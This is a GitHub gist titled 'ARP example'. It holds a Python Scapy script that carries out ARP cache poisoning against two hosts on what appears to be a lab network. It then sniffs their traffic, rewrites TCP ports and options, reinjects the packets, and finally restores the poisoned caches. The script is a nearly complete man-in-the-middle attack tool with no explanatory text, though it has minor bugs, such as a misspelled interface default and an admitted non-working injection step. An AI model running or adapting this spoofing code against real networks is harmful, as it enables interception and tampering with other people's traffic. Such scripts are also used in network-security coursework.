Created
March 9, 2022 23:10
-
-
Save viz-prakash/509fab4fddc1c404cacb627f704804b1 to your computer and use it in GitHub Desktop.
ARP example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import concurrent.futures | |
import subprocess | |
from time import sleep | |
from scapy.all import * | |
IP_A = "10.9.0.5" | |
MAC_A = "02:42:0a:09:00:05" | |
IP_B = "10.9.0.6" | |
MAC_B = "02:42:0a:09:00:06" | |
MAC_M = "02:42:0a:09:00:69" | |
QUIT=False | |
def stop_now(packet): | |
return QUIT | |
def get_MAC(ipaddr, iface="eht0"): | |
results, unanswered = sr(ARP(op="who-has", pdst=ipaddr), iface=iface, retry=-5, verbose=0) | |
if len(results) > 0: | |
return results[0][1].hwsrc | |
return None | |
def spoof(target_ip, target_mac, host, count=0): | |
print("Starting the spoof...") | |
while (not QUIT): | |
#print("in the while, quit value: {}".format(QUIT)) | |
A = ARP(op="is-at", psrc=host, hwdst=target_mac, pdst=target_ip) | |
pkt = send(A, verbose=False, return_packets=True) | |
print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0]))) | |
if count > 0: | |
sleep(1) | |
else: | |
sleep(2) | |
print("Stopping spoof - {}".format(QUIT)) | |
def restore(target_ip, target_mac, host, host_mac, count=5, only_target=False): | |
print("Restoring the poisoned caches...") | |
while count: | |
A = ARP(op="is-at", hwsrc=host_mac, psrc = host, hwdst=target_mac, pdst=target_ip) | |
#print("sending {}".format(repr(A))) | |
#send(A) | |
pkt = send(A, verbose=False, return_packets=True) | |
print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0]))) | |
if only_target: | |
continue | |
A = ARP(op="is-at", hwsrc=target_mac, psrc=target_ip, hwdst=host_mac, pdst=host) | |
#print("sending {}".format(repr(A))) | |
#send(A) | |
pkt = send(A, verbose=False, return_packets=True) | |
print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0]))) | |
sleep(1) | |
count -= 1 | |
def arp_spoofing(target, host, interface="eth0", only_target=False): | |
#send ARP request | |
#fetch the MAC address from the responses | |
target_MAC = get_MAC(target, interface) | |
host_MAC = get_MAC(host, interface) | |
print("Target's MAC: {}, Host's MAC: {}".format(target_MAC, host_MAC)) | |
#start the threads to keep spoofing in while loop | |
#spoof the target and host (if needed) | |
executor = concurrent.futures.ThreadPoolExecutor(max_workers=5) | |
future1 = executor.submit(spoof, target, target_MAC, host) | |
if not only_target: | |
future2 = executor.submit(spoof, host, host_MAC, target) | |
def sniff_modify(packet): | |
#ls(packet) | |
print(repr(packet)) | |
sleep(1) | |
#modification and injecting the packet without ip_forwarding doesn't work | |
#TODO: needs to figure out why | |
if packet[Ether].src == target_MAC: | |
packet[Ether].src = packet[Ether].dst | |
packet[Ether].dst = host_MAC | |
ip = packet[IP] | |
tcp = packet[TCP] | |
tcp.dport = 8000 | |
tcp.sport = 56999 | |
print(tcp.options) | |
new_opt = [] | |
for opt in tcp.options: | |
if opt[0] == 'SAckOK': | |
continue | |
new_opt.append(opt) | |
tcp.options = new_opt | |
pkt = ip/tcp | |
print("packet modified") | |
print(repr(packet)) | |
send(pkt, iface="eth0", ) | |
print("sent....") | |
elif packet[Ether].src == host_MAC: | |
packet[Ether].src = packet[Ether].dst | |
packet[Ether].dst = target_MAC | |
print("packet modified") | |
print(repr(packet)) | |
sendp(packet) | |
print("sent....") | |
#keep reading data asynchronously and transferring data | |
#f = 'ip and ((src {} and dst {}) or (src {} and dst {}))'.format( | |
# target, host, host, target) | |
f = 'ether src {} or ether src {}'.format(target_MAC, host_MAC) | |
sniff(iface=interface, filter=f, prn=sniff_modify, stop_filter=stop_now) | |
global QUIT | |
QUIT = True | |
restore(target, target_MAC, host, host_MAC) | |
print("Done!") | |
if __name__ == "__main__": | |
#cmd = "sysctl net.ipv4.ip_forward=1" | |
#subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,shell=True) | |
arp_spoofing(target=IP_A,host=IP_B) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment